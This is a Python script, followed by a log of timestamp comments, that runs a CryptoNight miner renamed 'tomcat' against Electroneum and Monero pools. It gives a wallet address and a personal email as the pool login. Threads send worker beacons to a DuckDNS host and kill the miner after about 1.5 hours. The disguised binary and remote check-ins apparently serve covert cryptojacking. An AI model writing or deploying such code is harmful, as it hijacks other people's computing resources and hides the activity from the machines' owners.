import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:07:03.940728
#2018-02-17 15:53:07.162288
#2018-02-17 17:42:01.755364
#2018-02-17 19:31:01.392294
#2018-02-17 21:20:06.284269
#2018-02-17 23:04:05.696544
#2018-02-18 00:51:06.407603
#2018-02-18 02:38:07.166195
#2018-02-18 04:26:05.029910
#2018-02-18 06:17:02.088620
#2018-02-18 08:07:02.138669
#2018-02-18 09:54:03.723983
#2018-02-18 11:41:06.841418
#2018-02-18 13:26:01.927058
#2018-02-18 15:16:05.610946
#2018-02-18 17:05:08.484030
#2018-02-18 18:52:04.346612
#2018-02-18 20:39:06.154198
#2018-02-18 22:25:06.182741
#2018-02-19 00:14:07.096002
#2018-02-19 02:00:09.117535
#2018-02-19 03:47:03.382697
#2018-02-19 05:33:05.762626
#2018-02-19 07:21:06.012467
#2018-02-19 09:11:08.032168
#2018-02-19 11:01:05.018900
#2018-02-19 12:48:08.561090
#2018-02-19 14:35:05.955398
#2018-02-19 16:24:01.451753
#2018-02-19 18:14:07.881628
#2018-02-19 20:01:06.444050
#2018-02-19 21:51:07.063385
#2018-02-19 23:37:05.306313
#2018-02-20 01:23:02.134105
#2018-02-20 03:13:05.955016
#2018-02-20 04:59:06.134012
#2018-02-20 06:42:01.356047
#2018-02-20 08:27:01.950870
#2018-02-20 10:12:01.568046
#2018-02-20 11:56:06.496101
#2018-02-20 13:45:07.378037
#2018-02-20 15:28:10.154848
#2018-02-20 17:15:08.946653
#2018-02-20 19:06:04.317801
#2018-02-20 20:54:06.480729
#2018-02-20 22:39:05.918371
#2018-02-21 00:21:06.985129
#2018-02-21 02:08:04.672655
#2018-02-21 03:55:05.390806
#2018-02-21 05:42:03.190630
#2018-02-21 07:29:07.759880
#2018-02-21 09:14:03.841808
#2018-02-21 11:04:09.319799
#2018-02-21 12:51:10.204532
#2018-02-21 14:38:08.908708
#2018-02-21 16:24:01.802695
#2018-02-21 18:14:05.283034
#2018-02-21 20:00:04.614128
#2018-02-21 21:47:02.250514
#2018-02-21 23:42:01.399970
#2018-02-22 01:31:08.133687
#2018-02-22 03:20:09.422004
#2018-02-22 05:09:04.139994
#2018-02-22 06:53:05.108662
#2018-02-22 08:40:09.609639
#2018-02-22 10:27:07.285072
#2018-02-22 12:12:09.100142
#2018-02-22 13:57:07.786373
#2018-02-22 15:44:13.016505
#2018-02-22 17:31:06.242445
#2018-02-22 19:18:08.898920
#2018-02-22 21:09:07.015179
#2018-02-22 22:55:06.080667
#2018-02-23 00:41:06.471572
#2018-02-23 02:29:03.941290
#2018-02-23 04:18:07.306115
#2018-02-23 06:05:08.112777
#2018-02-23 07:50:04.688774
#2018-02-23 10:11:08.623392
#2018-02-23 12:05:02.919578
#2018-02-23 13:52:08.642333
#2018-02-23 15:43:01.624063
#2018-02-23 17:29:07.895974
#2018-02-23 19:17:03.991666
#2018-02-23 21:01:07.976865
#2018-02-23 22:46:05.241796
#2018-02-24 00:31:01.727677
#2018-02-24 02:22:02.137838
#2018-02-24 04:11:04.262970
#2018-02-24 05:59:05.136839
#2018-02-24 07:47:03.906800
#2018-02-24 09:31:04.352473
#2018-02-24 11:24:05.092672
#2018-02-24 13:13:01.263604
#2018-02-24 15:03:03.607341
#2018-02-24 16:52:06.298789
#2018-02-24 18:40:08.511460
#2018-02-24 20:31:07.297519
#2018-02-24 22:30:01.619120
#2018-02-25 01:39:07.475493
#2018-02-25 05:16:06.490593
#2018-02-25 11:16:01.708039